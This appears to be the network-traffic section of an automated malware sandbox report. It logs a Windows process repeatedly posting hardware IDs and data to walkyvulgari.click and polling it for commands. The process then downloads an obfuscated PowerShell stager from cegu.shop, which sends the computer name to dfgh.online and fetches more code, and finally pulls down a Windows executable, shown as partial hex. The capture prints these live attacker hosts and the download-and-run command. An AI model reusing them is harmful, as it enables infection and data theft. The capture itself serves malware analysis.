                                                                                                                                      2024-12-27 09:21:39 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=0N3UFN57
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20374
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:39 UTC15331OUTData Raw: 2d 2d 30 4e 33 55 46 4e 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 30 4e 33 55 46 4e 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4e 33 55 46 4e 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 31 0d 0a 2d 2d 30 4e 33 55 46 4e 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                                                                                                                      Data Ascii: --0N3UFN57Content-Disposition: form-data; name="hwid"F30E1319BE25E0D44EC0E979F11769B5--0N3UFN57Content-Disposition: form-data; name="pid"3--0N3UFN57Content-Disposition: form-data; name="lid"jMw1IE--l1--0N3UFN57Content-Disposition
                                                                                                                                      2024-12-27 09:21:39 UTC5043OUTData Raw: e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00 00 00
                                                                                                                                      Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                                                                                                                      2024-12-27 09:21:40 UTC1133INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:40 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=pqqirmqc6nrj2h9i9u533u9j44; expires=Tue, 22 Apr 2025 03:08:19 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uLVvcscB3Jc0nmD9DNOutKBPwHL8y8PX2iRj%2FlW2VqS7xKau51Wq9arYS4nQWWiQstws%2BbjII3mKrGfh6ItNIESpg%2FRxss08u%2Fk4dWnZrbgAlEr87ZDvNBLQoDBgKoAD1n2UOc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883ddea9c943a9-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1667&rtt_var=641&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21328&delivery_rate=1685912&cwnd=245&unsent_bytes=0&cid=7627d823ce994402&ts=961&x=0"
                                                                                                                                      2024-12-27 09:21:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-27 09:21:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449741104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:41 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=IHJ0218SYB1Q9LI
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1236
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:41 UTC1236OUTData Raw: 2d 2d 49 48 4a 30 32 31 38 53 59 42 31 51 39 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 49 48 4a 30 32 31 38 53 59 42 31 51 39 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 48 4a 30 32 31 38 53 59 42 31 51 39 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 31 0d 0a 2d 2d 49 48 4a 30 32 31 38 53
                                                                                                                                      Data Ascii: --IHJ0218SYB1Q9LIContent-Disposition: form-data; name="hwid"F30E1319BE25E0D44EC0E979F11769B5--IHJ0218SYB1Q9LIContent-Disposition: form-data; name="pid"1--IHJ0218SYB1Q9LIContent-Disposition: form-data; name="lid"jMw1IE--l1--IHJ0218S
                                                                                                                                      2024-12-27 09:21:42 UTC1133INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:42 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lm4lf8obdmjlq2htmsuhqk7t0v; expires=Tue, 22 Apr 2025 03:08:21 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOOGB5m6obOi0t3oRnmZOo05evfGqCmWIJbQRVBG1pqGVkcVVu6zAfeANmncWjTqkJzCy%2BUAcIbp%2FY4%2BTAuzzDkHjW37aty226N%2FBI43%2Bv33shKQ8qSKHzg37mwufvvb%2FllfTNQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883dede9dc4273-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1573&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2152&delivery_rate=1812538&cwnd=32&unsent_bytes=0&cid=e9bdb87909b295c1&ts=789&x=0"
                                                                                                                                      2024-12-27 09:21:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-27 09:21:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449742104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:43 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=DSY32N426ZZ8QQEBTJ
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1106
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:43 UTC1106OUTData Raw: 2d 2d 44 53 59 33 32 4e 34 32 36 5a 5a 38 51 51 45 42 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 44 53 59 33 32 4e 34 32 36 5a 5a 38 51 51 45 42 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 53 59 33 32 4e 34 32 36 5a 5a 38 51 51 45 42 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 31 0d 0a 2d
                                                                                                                                      Data Ascii: --DSY32N426ZZ8QQEBTJContent-Disposition: form-data; name="hwid"F30E1319BE25E0D44EC0E979F11769B5--DSY32N426ZZ8QQEBTJContent-Disposition: form-data; name="pid"1--DSY32N426ZZ8QQEBTJContent-Disposition: form-data; name="lid"jMw1IE--l1-
                                                                                                                                      2024-12-27 09:21:44 UTC1124INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:44 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=upcv82u2g7kd309ojqnd5lsqpq; expires=Tue, 22 Apr 2025 03:08:23 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L0W8ondmdifYQ2Tb6XM6HU9zHayKlQWXgmdyGOEG9IPdgK7Szeav7bJF1mWZzNSHDb3FypC8s8MGnOQivJUcUAGazXmtAv0nZgJ661rf5QI%2BDVvL8Br3uIonCo3mNwlu3qnOkTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883dfa9c7a42d0-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1654&rtt_var=630&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2025&delivery_rate=1723730&cwnd=207&unsent_bytes=0&cid=205204e267be2b94&ts=805&x=0"
                                                                                                                                      2024-12-27 09:21:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-27 09:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449743104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:45 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 111
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:45 UTC111OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 31 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--l1&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=F30E1319BE25E0D44EC0E979F11769B5
                                                                                                                                      2024-12-27 09:21:46 UTC1130INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:46 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=m57kkgh4n62otgbmomvus5pc2v; expires=Tue, 22 Apr 2025 03:08:25 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m2VW7shqOXPjaw8Th2PhfuZgN2DB%2F1sU1CjOtsNZ848qCyxOBQ0CS3c0iYau7VT5qo9C7hYlg0iLfBTthqsiBZYpnR5SMv7C%2FjUPzLM%2Bnq6p8IQATCOEQ3ZusEOmZTm%2BSYoScn0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883e080ba58c42-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1983&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1014&delivery_rate=1439842&cwnd=252&unsent_bytes=0&cid=b7a9650e3e24c88a&ts=779&x=0"
                                                                                                                                      2024-12-27 09:21:46 UTC218INData Raw: 64 34 0d 0a 7a 50 66 38 4c 72 4d 4b 6a 4d 54 68 56 64 47 67 6e 4b 73 6b 65 55 6c 35 66 78 53 78 64 6d 6c 56 31 46 6e 41 67 4d 31 49 34 2f 69 58 6a 4e 35 62 6b 54 43 75 72 4a 55 68 6f 64 4f 6d 39 77 73 6c 5a 68 6f 61 63 38 52 59 47 6a 32 37 4b 5a 79 76 39 58 33 55 7a 50 37 42 7a 68 71 48 50 4e 44 72 6b 54 33 2f 31 4f 54 66 42 6c 56 72 48 77 73 32 69 30 52 46 64 37 46 37 2b 72 47 77 5a 4a 6a 61 75 64 58 47 44 4e 74 2b 2b 4c 53 53 62 34 32 50 77 49 52 50 46 53 41 4a 44 47 33 4c 47 51 34 77 72 58 65 7a 36 4b 49 34 76 39 65 6c 6d 59 68 78 30 47 62 38 6d 35 49 39 73 49 37 6f 30 31 42 62 5a 56 73 5a 59 4a 4e 4d 57 58 6e 32 50 4f 4b 36 2f 54 57 2b 0d 0a
                                                                                                                                      Data Ascii: d4zPf8LrMKjMThVdGgnKskeUl5fxSxdmlV1FnAgM1I4/iXjN5bkTCurJUhodOm9wslZhoac8RYGj27KZyv9X3UzP7BzhqHPNDrkT3/1OTfBlVrHws2i0RFd7F7+rGwZJjaudXGDNt++LSSb42PwIRPFSAJDG3LGQ4wrXez6KI4v9elmYhx0Gb8m5I9sI7o01BbZVsZYJNMWXn2POK6/TW+
                                                                                                                                      2024-12-27 09:21:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.449744185.161.251.214434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:48 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Host: cegu.shop
                                                                                                                                      2024-12-27 09:21:49 UTC249INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.2
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:49 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 329
                                                                                                                                      Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "676c9e2a-149"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-12-27 09:21:49 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                      Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.449745172.67.214.1864434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:50 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Host: klipsyzogey.shop
                                                                                                                                      2024-12-27 09:21:51 UTC910INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:51 GMT
                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Content-Length: 12178693
                                                                                                                                      Connection: close
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      ETag: "1ebab72f39900f4db9d82a4850b32abd"
                                                                                                                                      Last-Modified: Thu, 26 Dec 2024 20:14:25 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L9MUGbOowH5%2BrDv5063BSEl3%2FXYddID1tJLtTnK5P0Xh15Wwh9y4yCRZdAlmcwkYrTgO8rqT4XwahcwrTh%2BeMnh%2B%2FjFufEYTAxNT5PMbfBzpGEF%2FyF2b97qCR2%2F0x1RiFEK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883e274caec431-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1615&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1766485&cwnd=229&unsent_bytes=0&cid=fde673e1cee986d7&ts=602&x=0"
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 09 4e 61 74 69 76 65 49 6e 74 04 00 00 00 80 ff ff ff 7f 02 00 00 00 74 11 40 00 01 0a 4e 61 74 69 76 65 55 49 6e 74 05 00 00 00 00 ff ff ff ff 02 00 00 90 11 40 00 04 06 53 69 6e 67 6c 65 00 02 00 00 a0 11 40 00 04 08 45 78 74 65 6e 64 65 64 02 02 00 00 00 00 b4 11 40 00 04 06 44 6f 75 62 6c 65 01 02 00 00 c4 11 40 00 04 04 43 6f 6d 70 03 02 00 00 00 00 d4 11 40 00 04 08 43 75 72 72 65 6e 63 79 04 02 00 00 00 00 e8 11 40 00 05 0b 53 68 6f 72 74 53 74 72 69 6e 67 ff 02 00 fc 11 40 00 14 09 50 41 6e 73 69 43 68 61 72 30 10 40 00 02 00 00 00 00 14 12 40 00 14 09 50 57 69 64 65 43 68 61 72 4c 10 40 00 02 00 00 00 00 2c 12 40 00 03 08 42 79 74 65 42 6f 6f 6c 00 00 00 00 80 ff ff ff 7f 28 12 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00
                                                                                                                                      Data Ascii: NativeIntt@NativeUInt@Single@Extended@Double@Comp@Currency@ShortString@PAnsiChar0@@PWideCharL@,@ByteBool(@FalseTrueSystem
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 00 02 00 0b 28 9c 4a 00 0c 26 6f 70 5f 4c 65 73 73 54 68 61 6e 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 13 26 6f 70 5f 4c 65 73 73 54 68 61 6e 4f 72 45 71 75 61 6c 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 7c 17 40 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 1f 40 00 00 00 00 00 7c 17 40 00 00 00 00 00 92 18 40 00 08 00 00 00 00 00 00 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 22 00 9a 18 40 00 44 00 f4 ff c0 18 40 00 42 00 f4 ff e4 18 40 00 42 00 f4 ff 0d 19 40 00 43 00 f4 ff 4b 19 40 00 42 00 f4 ff 7a 19 40 00 42 00 f4 ff a3
                                                                                                                                      Data Ascii: (J&op_LessThan@@Left@Right(J&op_LessThanOrEqual@@Left@Right|@@|@@~@@@@@@@@}@}@}@"@D@B@B@CK@Bz@B
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 04 4e 61 6d 65 02 00 02 00 46 00 04 7f 40 00 0c 47 65 74 49 6e 74 65 72 66 61 63 65 03 00 00 10 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 20 00 00 00 00 02 00 03 4f 62 6a 02 00 02 00 3e 00 68 7f 40 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 45 6e 74 72 79 03 00 a0 14 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 02 00 31 00 28 9c 4a 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 54 61 62 6c 65 03 00 2c 15 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 ac 7f 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00
                                                                                                                                      Data Ascii: Address@@Self@NameF@GetInterface@@Self@@IID Obj>h@GetInterfaceEntry@Self@@IID1(JGetInterfaceTable,@Self3@UnitName@
